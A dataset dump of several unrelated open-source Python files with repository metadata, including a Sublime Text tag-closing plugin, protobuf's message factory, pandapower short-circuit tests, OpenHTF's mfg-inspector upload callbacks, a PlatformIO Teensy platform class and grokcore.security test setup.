] | null | null | null |
import sublime, sublime_plugin
from Tag import Tag
Tag = Tag.Tag()
class TagCloseTagCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
is_xml = Tag.view_is_xml(view);
closed_some_tag = False
new_selections = []
new_selections_insert = []
for region in view.sel():
cursorPosition = region.begin()
tag = self.close_tag(view.substr(sublime.Region(0, cursorPosition)), is_xml)
if tag and tag != '</':
if region.empty():
replace = False
view.insert(edit, cursorPosition, tag);
else:
replace = True
view.replace(edit, sublime.Region(region.begin(), region.end()), '');
view.insert(edit, cursorPosition, tag);
if tag != '</':
closed_some_tag = True
if replace:
new_selections_insert.append(sublime.Region(region.begin()+len(tag), region.begin()+len(tag)))
else:
new_selections_insert.append(sublime.Region(region.end()+len(tag), region.end()+len(tag)))
else:
new_selections.append(sublime.Region(region.end()+len(tag), region.end()+len(tag)))
else:
new_selections.append(sublime.Region(region.end(), region.end()))
view.sel().clear()
# we inserted the "</tagname" part.
# running the command "insert" with parameter ">" to allow
# to the application indent these tags correctly
if closed_some_tag:
view.run_command('hide_auto_complete')
for sel in new_selections_insert:
view.sel().add(sel)
view.run_command('insert', {"characters": ">"})
view.run_command('reindent', {"force_indent": True})
for sel in new_selections:
view.sel().add(sel)
def close_tag(self, data, is_xml):
data = Tag.clean_html(data).split('<')
data.reverse()
try:
i = 0
lenght = len(data)-1
while i < lenght:
tag = Tag.name(data[i], True, is_xml)
# if opening tag, close the tag
if tag:
if not Tag.is_closing(data[i]):
return '</'+Tag.name(data[i], True, is_xml)+''
# if closing tag, jump to opening tag
else:
i = i+1
skip = 0
while i < lenght:
if Tag.name(data[i], True, is_xml) == tag:
if not Tag.is_closing(data[i]):
if skip == 0:
break
else:
skip = skip-1
else:
skip = skip+1
i = i+1
i = i+1
return ''
except:
return '';
| 26.609195
| 100
| 0.62635
|
4770ae156a6d91406dfda4e71cf6e8bf48f2a5cf
| 7,667
|
py
|
Python
|
Website/FlaskWebsite/env/Lib/site-packages/google/protobuf/message_factory.py
|
amirpaia/election-campaign-dynamics
|
b2b32c627cb79c7eb60e458511210308b7ff4035
|
[
"CC0-1.0"
] | 6
|
2022-02-04T18:12:24.000Z
|
2022-03-21T23:57:12.000Z
|
Website/FlaskWebsite/env/Lib/site-packages/google/protobuf/message_factory.py
|
amirpaia/election-campaign-dynamics
|
b2b32c627cb79c7eb60e458511210308b7ff4035
|
[
"CC0-1.0"
] | null | null | null |
Website/FlaskWebsite/env/Lib/site-packages/google/protobuf/message_factory.py
|
amirpaia/election-campaign-dynamics
|
b2b32c627cb79c7eb60e458511210308b7ff4035
|
[
"CC0-1.0"
] | 1
|
2022-02-08T03:53:23.000Z
|
2022-02-08T03:53:23.000Z
|
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Provides a factory class for generating dynamic messages.
The easiest way to use this class is if you have access to the FileDescriptor
protos containing the messages you want to create you can just do the following:
message_classes = message_factory.GetMessages(iterable_of_file_descriptors)
my_proto_instance = message_classes['some.proto.package.MessageName']()
"""
__author__ = 'matthewtoia@google.com (Matt Toia)'
from google.protobuf.internal import api_implementation
from google.protobuf import descriptor_pool
from google.protobuf import message
if api_implementation.Type() == 'cpp':
from google.protobuf.pyext import cpp_message as message_impl
else:
from google.protobuf.internal import python_message as message_impl
# The type of all Message classes.
_GENERATED_PROTOCOL_MESSAGE_TYPE = message_impl.GeneratedProtocolMessageType
class MessageFactory(object):
"""Factory for creating Proto2 messages from descriptors in a pool."""
def __init__(self, pool=None):
"""Initializes a new factory."""
self.pool = pool or descriptor_pool.DescriptorPool()
# local cache of all classes built from protobuf descriptors
self._classes = {}
def GetPrototype(self, descriptor):
"""Obtains a proto2 message class based on the passed in descriptor.
Passing a descriptor with a fully qualified name matching a previous
invocation will cause the same class to be returned.
Args:
descriptor: The descriptor to build from.
Returns:
A class describing the passed in descriptor.
"""
if descriptor not in self._classes:
result_class = self.CreatePrototype(descriptor)
# The assignment to _classes is redundant for the base implementation, but
# might avoid confusion in cases where CreatePrototype gets overridden and
# does not call the base implementation.
self._classes[descriptor] = result_class
return result_class
return self._classes[descriptor]
def CreatePrototype(self, descriptor):
"""Builds a proto2 message class based on the passed in descriptor.
Don't call this function directly, it always creates a new class. Call
GetPrototype() instead. This method is meant to be overridden in subblasses
to perform additional operations on the newly constructed class.
Args:
descriptor: The descriptor to build from.
Returns:
A class describing the passed in descriptor.
"""
descriptor_name = descriptor.name
result_class = _GENERATED_PROTOCOL_MESSAGE_TYPE(
descriptor_name,
(message.Message,),
{
'DESCRIPTOR': descriptor,
# If module not set, it wrongly points to message_factory module.
'__module__': None,
})
result_class._FACTORY = self # pylint: disable=protected-access
# Assign in _classes before doing recursive calls to avoid infinite
# recursion.
self._classes[descriptor] = result_class
for field in descriptor.fields:
if field.message_type:
self.GetPrototype(field.message_type)
for extension in result_class.DESCRIPTOR.extensions:
if extension.containing_type not in self._classes:
self.GetPrototype(extension.containing_type)
extended_class = self._classes[extension.containing_type]
extended_class.RegisterExtension(extension)
return result_class
def GetMessages(self, files):
"""Gets all the messages from a specified file.
This will find and resolve dependencies, failing if the descriptor
pool cannot satisfy them.
Args:
files: The file names to extract messages from.
Returns:
A dictionary mapping proto names to the message classes. This will include
any dependent messages as well as any messages defined in the same file as
a specified message.
"""
result = {}
for file_name in files:
file_desc = self.pool.FindFileByName(file_name)
for desc in file_desc.message_types_by_name.values():
result[desc.full_name] = self.GetPrototype(desc)
# While the extension FieldDescriptors are created by the descriptor pool,
# the python classes created in the factory need them to be registered
# explicitly, which is done below.
#
# The call to RegisterExtension will specifically check if the
# extension was already registered on the object and either
# ignore the registration if the original was the same, or raise
# an error if they were different.
for extension in file_desc.extensions_by_name.values():
if extension.containing_type not in self._classes:
self.GetPrototype(extension.containing_type)
extended_class = self._classes[extension.containing_type]
extended_class.RegisterExtension(extension)
return result
_FACTORY = MessageFactory()
def GetMessages(file_protos):
"""Builds a dictionary of all the messages available in a set of files.
Args:
file_protos: Iterable of FileDescriptorProto to build messages out of.
Returns:
A dictionary mapping proto names to the message classes. This will include
any dependent messages as well as any messages defined in the same file as
a specified message.
"""
# The cpp implementation of the protocol buffer library requires to add the
# message in topological order of the dependency graph.
file_by_name = {file_proto.name: file_proto for file_proto in file_protos}
def _AddFile(file_proto):
for dependency in file_proto.dependency:
if dependency in file_by_name:
# Remove from elements to be visited, in order to cut cycles.
_AddFile(file_by_name.pop(dependency))
_FACTORY.pool.Add(file_proto)
while file_by_name:
_AddFile(file_by_name.popitem()[1])
return _FACTORY.GetMessages([file_proto.name for file_proto in file_protos])
| 41.22043
| 81
| 0.728838
|
8a939c5fe7714a6d900c86707ffc88e14b3ba43e
| 3,394
|
py
|
Python
|
pandapower/test/shortcircuit/test_sgen.py
|
gdgarcia/pandapower
|
630e3278ca012535f78282ae73f1b86f3fe932fc
|
[
"BSD-3-Clause"
] | null | null | null |
pandapower/test/shortcircuit/test_sgen.py
|
gdgarcia/pandapower
|
630e3278ca012535f78282ae73f1b86f3fe932fc
|
[
"BSD-3-Clause"
] | 1
|
2019-04-17T14:58:53.000Z
|
2019-04-17T14:58:53.000Z
|
pandapower/test/shortcircuit/test_sgen.py
|
gdgarcia/pandapower
|
630e3278ca012535f78282ae73f1b86f3fe932fc
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2016-2020 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
import numpy as np
import pytest
import pandapower as pp
import pandapower.shortcircuit as sc
@pytest.fixture
def wind_park_example():
net = pp.create_empty_network()
b1 = pp.create_bus(net, vn_kv=110., index=1)
b2 = pp.create_bus(net, vn_kv=110., index=2)
b3 = pp.create_bus(net, vn_kv=110., index=3)
b4 = pp.create_bus(net, vn_kv=110., index=4)
pp.create_ext_grid(net, b1, s_sc_max_mva=20*110*np.sqrt(3), rx_max=0.1)
pp.create_line_from_parameters(net, from_bus=b1, to_bus=b2, length_km=100, r_ohm_per_km=0.120, x_ohm_per_km=0.393, c_nf_per_km=0, max_i_ka=10)
pp.create_line_from_parameters(net, from_bus=b1, to_bus=b3, length_km=50, r_ohm_per_km=0.120, x_ohm_per_km=0.393, c_nf_per_km=0, max_i_ka=10)
pp.create_line_from_parameters(net, from_bus=b2, to_bus=b3, length_km=50, r_ohm_per_km=0.120, x_ohm_per_km=0.393, c_nf_per_km=0, max_i_ka=10)
pp.create_line_from_parameters(net, from_bus=b3, to_bus=b4, length_km=25, r_ohm_per_km=0.120, x_ohm_per_km=0.393, c_nf_per_km=0, max_i_ka=10)
pp.create_sgen(net, b2, p_mw=0.1e3, sn_mva=100)
pp.create_sgen(net, b3, p_mw=0.050e3, sn_mva=50)
pp.create_sgen(net, b4, p_mw=0.050e3, sn_mva=50)
net.sgen["k"] = 1.2
return net
@pytest.fixture
def three_bus_example():
net = pp.create_empty_network()
b1 = pp.create_bus(net, 110)
b2 = pp.create_bus(net, 110)
b3 = pp.create_bus(net, 110)
pp.create_ext_grid(net, b1, s_sc_max_mva=100., s_sc_min_mva=80., rx_min=0.4, rx_max=0.4)
pp.create_line(net, b1, b2, std_type="305-AL1/39-ST1A 110.0" , length_km=20.)
pp.create_line(net, b2, b3, std_type="N2XS(FL)2Y 1x185 RM/35 64/110 kV" , length_km=15.)
net.line["endtemp_degree"] = 80
pp.create_sgen(net, b2, sn_mva=2, p_mw=0, k=1.2)
return net
def test_max_branch_results(three_bus_example):
net = three_bus_example
sc.calc_sc(net, case="max", ip=True, ith=True, branch_results=True)
assert np.allclose(net.res_bus_sc.ikss_ka.values, np.array([0.53746061, 0.50852707, 0.4988896]))
assert np.allclose(net.res_line_sc.ikss_ka.values, np.array([ 0.49593034, 0.4988896 ]))
assert np.allclose(net.res_line_sc.ip_ka.values, np.array([ 0.92787443, 0.9251165 ]))
assert np.allclose(net.res_line_sc.ith_ka.values, np.array([ 0.49811957, 0.50106881]))
def test_min_branch_results(three_bus_example):
net = three_bus_example
sc.calc_sc(net, case="min", ip=True, ith=True, branch_results=True)
assert np.allclose(net.res_bus_sc.ikss_ka.values, np.array([ 0.43248784, 0.41156533, 0.40431286]))
assert np.allclose(net.res_line_sc.ikss_ka.values, np.array([ 0.39171613, 0.40431286]))
assert np.allclose(net.res_line_sc.ip_ka.values, np.array([ 0.72795118, 0.74576565]))
assert np.allclose(net.res_line_sc.ith_ka.values, np.array([ 0.39340278, 0.40605375]))
def test_wind_park(wind_park_example):
net = wind_park_example
sc.calc_sc(net, ip=True)
assert np.isclose(net.res_bus_sc.ikss_ka.at[2], 3.9034, rtol=1e-4)
assert np.isclose(net.res_bus_sc.ip_ka.at[2], 7.3746, rtol=1e-4)
if __name__ == '__main__':
pytest.main(["test_sgen.py"])
| 47.802817
| 147
| 0.705657
|
900785961d6f5c92943fb1722a74c1c6acedf535
| 13,838
|
py
|
Python
|
openhtf/output/callbacks/mfg_inspector.py
|
prateekspanning/openhtf
|
831f0e3947a56c2b63665886659df2c14de926df
|
[
"Apache-2.0"
] | 372
|
2015-09-02T00:08:40.000Z
|
2022-03-30T17:29:30.000Z
|
openhtf/output/callbacks/mfg_inspector.py
|
prateekspanning/openhtf
|
831f0e3947a56c2b63665886659df2c14de926df
|
[
"Apache-2.0"
] | 772
|
2015-09-01T22:00:20.000Z
|
2022-02-10T14:53:14.000Z
|
openhtf/output/callbacks/mfg_inspector.py
|
prateekspanning/openhtf
|
831f0e3947a56c2b63665886659df2c14de926df
|
[
"Apache-2.0"
] | 204
|
2015-09-01T20:48:21.000Z
|
2022-03-13T22:20:50.000Z
|
"""Output and/or upload a TestRun or MfgEvent proto for mfg-inspector.com.
"""
import copy
import json
import logging
import threading
import time
from typing import Any, Dict
import zlib
import httplib2
import oauth2client.client
from openhtf import util
from openhtf.core import test_record
from openhtf.output import callbacks
from openhtf.output.proto import guzzle_pb2
from openhtf.output.proto import mfg_event_pb2
from openhtf.output.proto import test_runs_converter
import six
from six.moves import range
class UploadFailedError(Exception):
"""Raised when an upload to mfg-inspector fails."""
class InvalidTestRunError(Exception):
"""Raised if test run is invalid."""
def _send_mfg_inspector_request(envelope_data, credentials, destination_url):
"""Send upload http request. Intended to be run in retry loop."""
logging.info('Uploading result...')
http = httplib2.Http()
if credentials.access_token_expired:
credentials.refresh(http)
credentials.authorize(http)
resp, content = http.request(destination_url, 'POST', envelope_data)
try:
result = json.loads(content)
except Exception:
logging.warning('Upload failed with response %s: %s', resp, content)
raise UploadFailedError(resp, content)
if resp.status == 200:
return result
message = '%s: %s' % (result.get('error',
'UNKNOWN_ERROR'), result.get('message'))
if resp.status == 400:
raise InvalidTestRunError(message)
else:
raise UploadFailedError(message)
def send_mfg_inspector_data(inspector_proto, credentials, destination_url,
payload_type):
"""Upload MfgEvent to steam_engine."""
envelope = guzzle_pb2.TestRunEnvelope()
envelope.payload = zlib.compress(inspector_proto.SerializeToString())
envelope.payload_type = payload_type
envelope_data = envelope.SerializeToString()
for _ in range(5):
try:
result = _send_mfg_inspector_request(envelope_data, credentials,
destination_url)
return result
except UploadFailedError:
time.sleep(1)
logging.critical(
'Could not upload to mfg-inspector after 5 attempts. Giving up.')
return {}
class _MemStorage(oauth2client.client.Storage):
"""Helper Storage class that keeps credentials in memory."""
def __init__(self):
self._lock = threading.Lock()
self._credentials = None
def acquire_lock(self):
self._lock.acquire(True)
def release_lock(self):
self._lock.release()
def locked_get(self):
return self._credentials
def locked_put(self, credentials):
self._credentials = credentials
class MfgInspector(object):
"""Interface to convert a TestRun to a mfg-inspector compatible proto.
Instances of this class are typically used to create callbacks that are
compatible with the OpenHTF output callbacks.
Typical usage:
interface = mfg_inspector.MfgInspector.from_json().set_converter(
my_custom_converter)
my_tester.add_output_callbacks(interface.save_to_disk(), interface.upload())
**Important** the conversion of the TestRecord to protofbuf as specified in
the _converter callable attribute only occurs once and the resulting protobuf
is cached in memory on the instance.
The upload callback will upload to mfg-inspector.com using the given
username and authentication key (which should be the key data itself, not a
filename or file).
In typical productin setups, we *first* save the protobuf to disk then attempt
to upload the protobuf to mfg-inspector. In the event of a network outage,
the result of the test run is available on disk and a separate process can
retry the upload when network is available.
"""
TOKEN_URI = 'https://accounts.google.com/o/oauth2/token'
SCOPE_CODE_URI = 'https://www.googleapis.com/auth/glass.infra.quantum_upload'
DESTINATION_URL = ('https://clients2.google.com/factoryfactory/'
'uploads/quantum_upload/?json')
PARAMS = ['dut_id', 'end_time_millis', 'start_time_millis', 'station_id']
# These attributes control format of callback and what actions are undertaken
# when called. These should either be set by a subclass or via configure.
# _converter is a callable that can be set either via set_converter method
# or by defining a _converter @staticmethod on subclasses.
_converter = None
# A default filename pattern can be specified on subclasses for use when
# saving to disk via save_to_disk.
_default_filename_pattern = None
# Cached last partial upload of the run's MfgEvent.
_cached_partial_proto = None
# Partial proto fully uploaded.
_partial_proto_upload_complete = False
def __init__(self,
user=None,
keydata=None,
token_uri=TOKEN_URI,
destination_url=DESTINATION_URL):
self.user = user
self.keydata = keydata
self.token_uri = token_uri
self.destination_url = destination_url
if user and keydata:
self.credentials = oauth2client.client.SignedJwtAssertionCredentials(
service_account_name=self.user,
private_key=six.ensure_binary(self.keydata),
scope=self.SCOPE_CODE_URI,
user_agent='OpenHTF Guzzle Upload Client',
token_uri=self.token_uri)
self.credentials.set_store(_MemStorage())
else:
self.credentials = None
self.upload_result = None
self._cached_proto = None
self._cached_params = dict.fromkeys(self.PARAMS)
@classmethod
def from_json(cls, json_data):
"""Create an uploader given (parsed) JSON data.
Note that this is a JSON-formatted key file downloaded from Google when
the service account key is created, *NOT* a json-encoded
oauth2client.client.SignedJwtAssertionCredentials object.
Args:
json_data: Dict containing the loaded JSON key data.
Returns:
a MfgInspectorCallback with credentials.
"""
return cls(
user=json_data['client_email'],
keydata=json_data['private_key'],
token_uri=json_data['token_uri'])
def _check_cached_params(self, test_record_obj):
"""Check if all cached params equal the values in test record."""
for param in self.PARAMS:
if self._cached_params[param] != getattr(test_record_obj, param):
return False
return True
def _convert(self, test_record_obj):
"""Convert and cache a test record to a mfg-inspector proto."""
if (self._cached_proto is None or
not self._check_cached_params(test_record_obj)):
self._cached_proto = self._converter(test_record_obj)
for param in self.PARAMS:
self._cached_params[param] = getattr(test_record_obj, param)
return self._cached_proto
def _get_blobref_from_cache(self, attachment_name: str):
"""Gets the existing_blobref if attachment was already uploaded."""
if not self._cached_partial_proto:
return None
for attachment in self._cached_partial_proto.attachment:
if (attachment.name == attachment_name and
attachment.HasField('existing_blobref')):
return attachment.existing_blobref
def _get_blobref_from_reply(self, reply: Dict[str, Any],
attachment_name: str):
"""Gets the existing_blobref if attachment was already uploaded."""
for item in reply['extendedParameters']:
if (item['name'] == attachment_name and 'blobRef' in item):
return item['blobRef']
def _update_attachments_from_cache(self, proto: mfg_event_pb2.MfgEvent):
"""Replaces attachments binary values with blobrefs when applicable."""
for attachment in proto.attachment:
if attachment.HasField('value_binary'):
blobref = self._get_blobref_from_cache(attachment.name)
if blobref:
attachment.ClearField('value')
attachment.existing_blobref = blobref
def _update_attachments_from_reply(self, proto: mfg_event_pb2.MfgEvent):
"""Replaces attachments binary values with blorrefs when applicable."""
reply = json.loads(self.upload_result['lite_test_run'])
for attachment in proto.attachment:
if attachment.HasField('value_binary'):
literun_blobref = self._get_blobref_from_reply(reply, attachment.name)
if literun_blobref:
attachment.ClearField('value')
attachment.existing_blobref.blob_id = str.encode(
literun_blobref['BlobID'])
attachment.existing_blobref.size = int(literun_blobref['Size'])
def save_to_disk(self, filename_pattern=None):
"""Returns a callback to convert test record to proto and save to disk."""
if not self._converter:
raise RuntimeError(
'Must set _converter on subclass or via set_converter before calling '
'save_to_disk.')
pattern = filename_pattern or self._default_filename_pattern
if not pattern:
raise RuntimeError('Must specify provide a filename_pattern or set a '
'_default_filename_pattern on subclass.')
def save_to_disk_callback(test_record_obj):
proto = self._convert(test_record_obj)
output_to_file = callbacks.OutputToFile(pattern)
with output_to_file.open_output_file(test_record_obj) as outfile:
outfile.write(proto.SerializeToString())
return save_to_disk_callback
def upload(self, payload_type=guzzle_pb2.COMPRESSED_TEST_RUN):
"""Returns a callback to convert a test record to a proto and upload."""
if not self._converter:
raise RuntimeError(
'Must set _converter on subclass or via set_converter before calling '
'upload.')
if not self.credentials:
raise RuntimeError('Must provide credentials to use upload callback.')
def upload_callback(test_record_obj):
proto = self._convert(test_record_obj)
self.upload_result = send_mfg_inspector_data(proto, self.credentials,
self.destination_url,
payload_type)
return upload_callback
def partial_upload(self, payload_type: int = guzzle_pb2.COMPRESSED_TEST_RUN):
"""Returns a callback to partially upload a test record as a MfgEvent."""
if not self._converter:
raise RuntimeError(
'Must set _converter on subclass or via set_converter before calling '
'partial_upload.')
if not self.credentials:
raise RuntimeError('Must provide credentials to use partial_upload '
'callback.')
def partial_upload_callback(test_record_obj: test_record.TestRecord):
if not test_record_obj.end_time_millis:
# We cannot mutate the test_record_obj, so we copy it to add a
# fake end_time_millis which is needed for MfgEvent construction.
try:
tmp_test_record = copy.deepcopy(test_record_obj)
except TypeError:
# This happens when test has errored but the partial_uploader got a
# hold of the test record before it is finalized. We force an errored
# test to be processed with zero deepcopy thus only after
# end_time_mills is set in the test record.
print('Skipping this upload cycle, waiting for test to be finalized')
return {}
tmp_test_record.end_time_millis = util.time_millis()
# Also fake a PASS outcome for now.
tmp_test_record.outcome = test_record.Outcome.PASS
proto = self._convert(tmp_test_record)
proto.test_run_type = mfg_event_pb2.TEST_RUN_PARTIAL
else:
proto = self._convert(test_record_obj)
proto.test_run_type = mfg_event_pb2.TEST_RUN_COMPLETE
# Replaces the attachment payloads already uploaded with their blob_refs.
if (self._cached_partial_proto and
self._cached_partial_proto.start_time_ms == proto.start_time_ms):
# Reads the attachments in the _cached_partial_proto and merge them into
# the proto.
self._update_attachments_from_cache(proto)
# Avoids timing issue whereby last complete upload performed twice.
# This is only for projects that use a partial uploader to mfg-inspector.
if not self._partial_proto_upload_complete:
self.upload_result = send_mfg_inspector_data(
proto, self.credentials, self.destination_url, payload_type)
# Reads the upload_result (a lite_test_run proto) and update the
# attachments blob_refs.
self._update_attachments_from_reply(proto)
if proto.test_run_type == mfg_event_pb2.TEST_RUN_COMPLETE:
self._partial_proto_upload_complete = True
return self.upload_result
return partial_upload_callback
def set_converter(self, converter):
"""Set converter callable to convert a OpenHTF tester_record to a proto.
Args:
converter: a callable that accepts an OpenHTF TestRecord and returns a
manufacturing-inspector compatible protobuf.
Returns:
self to make this call chainable.
"""
assert callable(converter), 'Converter must be callable.'
self._converter = converter
return self
# LEGACY / DEPRECATED
class UploadToMfgInspector(MfgInspector):
"""Generate a mfg-inspector TestRun proto and upload it.
LEGACY / DEPRECATED
This class is provided only for legacy reasons and may be deleted in future.
Please replace usage by configuring a MfgInspectorCallback directly. For
example:
test.add_output_callbacks(
mfg_inspector.MfgInspectorCallback.from_json(**json_data).set_converter(
test_runs_converter.test_run_from_test_record).upload()
)
"""
@staticmethod
def _converter(test_record_obj):
return test_runs_converter.test_run_from_test_record(test_record_obj)
def __call__(self, test_record_obj):
upload_callback = self.upload()
upload_callback(test_record_obj)
| 36.511873
| 80
| 0.714843
|
b1204a1b48683105ba7ac406230815b2261bee39
| 5,739
|
py
|
Python
|
platform.py
|
lekoook/platform-teensy
|
d92b12a5d2b0c931e0ce4551fe1770b6db2592ce
|
[
"Apache-2.0"
] | null | null | null |
platform.py
|
lekoook/platform-teensy
|
d92b12a5d2b0c931e0ce4551fe1770b6db2592ce
|
[
"Apache-2.0"
] | null | null | null |
platform.py
|
lekoook/platform-teensy
|
d92b12a5d2b0c931e0ce4551fe1770b6db2592ce
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import platform
from platformio import exception, util
from platformio.managers.platform import PlatformBase
from platformio.util import get_systype
class TeensyPlatform(PlatformBase):
@staticmethod
def _is_macos():
systype = util.get_systype()
return "darwin_x86_64" in systype
@staticmethod
def _is_linux():
systype = util.get_systype()
return "linux_x86_64" in systype
@staticmethod
def _is_windows():
systype = util.get_systype()
return "windows" in systype
def configure_default_packages(self, variables, targets):
if variables.get("board"):
board_config = self.board_config(variables.get("board"))
del_toolchain = "toolchain-gccarmnoneeabi"
if board_config.get("build.core") != "teensy":
del_toolchain = "toolchain-atmelavr"
if del_toolchain in self.packages:
del self.packages[del_toolchain]
if self._is_linux() and "toolchain-arm-cortexm-mac" in self.packages:
del self.packages['toolchain-arm-cortexm-mac']
if self._is_linux() and "toolchain-arm-cortexm-win64" in self.packages:
del self.packages['toolchain-arm-cortexm-win64']
if self._is_linux() and "toolchain-gccarmnoneeabi" in self.packages:
del self.packages['toolchain-gccarmnoneeabi']
if self._is_macos() and "toolchain-arm-cortexm-linux" in self.packages:
del self.packages['toolchain-arm-cortexm-linux']
if self._is_macos() and "toolchain-arm-cortexm-win64" in self.packages:
del self.packages['toolchain-arm-cortexm-win64']
if self._is_macos() and "toolchain-gccarmnoneeabi" in self.packages:
del self.packages['toolchain-gccarmnoneeabi']
if self._is_windows() and "toolchain-arm-cortexm-linux" in self.packages:
del self.packages['toolchain-arm-cortexm-linux']
if self._is_windows() and "toolchain-arm-cortexm-mac" in self.packages:
del self.packages['toolchain-arm-cortexm-mac']
if self._is_windows() and "toolchain-gccarmnoneeabi" in self.packages:
del self.packages['toolchain-gccarmnoneeabi']
if "mbed" in variables.get("pioframework", []):
self.packages["toolchain-gccarmnoneeabi"][
"version"] = ">=1.60301.0,<1.80000.0"
# configure J-LINK tool
jlink_conds = [
"jlink" in variables.get(option, "")
for option in ("upload_protocol", "debug_tool")
]
if variables.get("board"):
board_config = self.board_config(variables.get("board"))
jlink_conds.extend([
"jlink" in board_config.get(key, "")
for key in ("debug.default_tools", "upload.protocol")
])
jlink_pkgname = "tool-jlink"
if not any(jlink_conds) and jlink_pkgname in self.packages:
del self.packages[jlink_pkgname]
return PlatformBase.configure_default_packages(
self, variables, targets)
def get_boards(self, id_=None):
result = PlatformBase.get_boards(self, id_)
if not result:
return result
if id_:
return self._add_default_debug_tools(result)
else:
for key, value in result.items():
result[key] = self._add_default_debug_tools(result[key])
return result
def _add_default_debug_tools(self, board):
debug = board.manifest.get("debug", {})
upload_protocols = board.manifest.get("upload", {}).get(
"protocols", [])
if "tools" not in debug:
debug["tools"] = {}
if "jlink" in upload_protocols and "jlink" not in debug["tools"]:
assert debug.get("jlink_device"), (
"Missed J-Link Device ID for %s" % board.id)
debug["tools"]["jlink"] = {
"server": {
"package": "tool-jlink",
"arguments": [
"-singlerun",
"-if", "SWD",
"-select", "USB",
"-device", debug.get("jlink_device"),
"-port", "2331"
],
"executable": ("JLinkGDBServerCL.exe"
if platform.system() == "Windows" else
"JLinkGDBServer")
}
}
board.manifest["debug"] = debug
return board
def configure_debug_options(self, initial_debug_options, ide_data):
debug_options = copy.deepcopy(initial_debug_options)
server_executable = debug_options["server"]["executable"].lower()
adapter_speed = initial_debug_options.get("speed")
if adapter_speed:
if "jlink" in server_executable:
debug_options["server"]["arguments"].extend(
["-speed", adapter_speed]
)
return debug_options
| 41.28777
| 85
| 0.597491
|
b8034ffeaad6ad8ec107e8d84d94fecf4b237034
| 1,398
|
py
|
Python
|
src/grokcore/security/tests/test_functional.py
|
zopefoundation/grokcore.security
|
82828d6f4f74db8bdd9e4bbcc5b7453bfb455cfe
|
[
"ZPL-2.1"
] | null | null | null |
src/grokcore/security/tests/test_functional.py
|
zopefoundation/grokcore.security
|
82828d6f4f74db8bdd9e4bbcc5b7453bfb455cfe
|
[
"ZPL-2.1"
] | 2
|
2018-01-03T13:56:03.000Z
|
2021-04-23T06:23:19.000Z
|
src/grokcore/security/tests/test_functional.py
|
zopefoundation/grokcore.security
|
82828d6f4f74db8bdd9e4bbcc5b7453bfb455cfe
|
[
"ZPL-2.1"
] | 2
|
2015-04-03T04:58:02.000Z
|
2018-01-12T06:52:41.000Z
|
import doctest
import grokcore.security
import unittest
import zope.app.wsgi.testlayer
import zope.testbrowser.wsgi
from pkg_resources import resource_listdir
from zope.app.wsgi.testlayer import http
class Layer(
zope.testbrowser.wsgi.TestBrowserLayer,
zope.app.wsgi.testlayer.BrowserLayer):
pass
layer = Layer(grokcore.security, allowTearDown=True)
def suiteFromPackage(name):
layer_dir = 'functional'
files = resource_listdir(__name__, '{}/{}'.format(layer_dir, name))
suite = unittest.TestSuite()
for filename in files:
if not filename.endswith('.py'):
continue
if filename == '__init__.py':
continue
dottedname = 'grokcore.security.tests.%s.%s.%s' % (
layer_dir, name, filename[:-3])
test = doctest.DocTestSuite(
dottedname,
extraglobs=dict(
getRootFolder=layer.getRootFolder,
http=http,
),
optionflags=(
doctest.ELLIPSIS +
doctest.NORMALIZE_WHITESPACE +
doctest.REPORT_NDIFF +
doctest.IGNORE_EXCEPTION_DETAIL))
test.layer = layer
suite.addTest(test)
return suite
def test_suite():
suite = unittest.TestSuite()
for name in [
'role']:
suite.addTest(suiteFromPackage(name))
return suite
| 26.377358
| 71
| 0.616595
|
047775eaad7b3aeb10f157ffa446d13ec7c2e515
| 740
|
py
|
Python
|
src/pipx/commands/__init__.py
|
KenMacD/pipx
|
2ecc668acf472ad6956cc682499c077c1130d17e
|
[
"MIT"
] | null | null | null |
src/pipx/commands/__init__.py
|
KenMacD/pipx
|
2ecc668acf472ad6956cc682499c077c1130d17e
|
[
"MIT"
] | 3
|
2022-03-23T01:19:59.000Z
|
2022-03-23T01:26:01.000Z
|
src/pipx/commands/__init__.py
|
KenMacD/pipx
|
2ecc668acf472ad6956cc682499c077c1130d17e
|
[
"MIT"
] | null | null | null |
from pipx.commands.ensure_path import ensure_pipx_paths
from pipx.commands.environment import environment
from pipx.commands.inject import inject
from pipx.commands.install import install
from pipx.commands.list_packages import list_packages
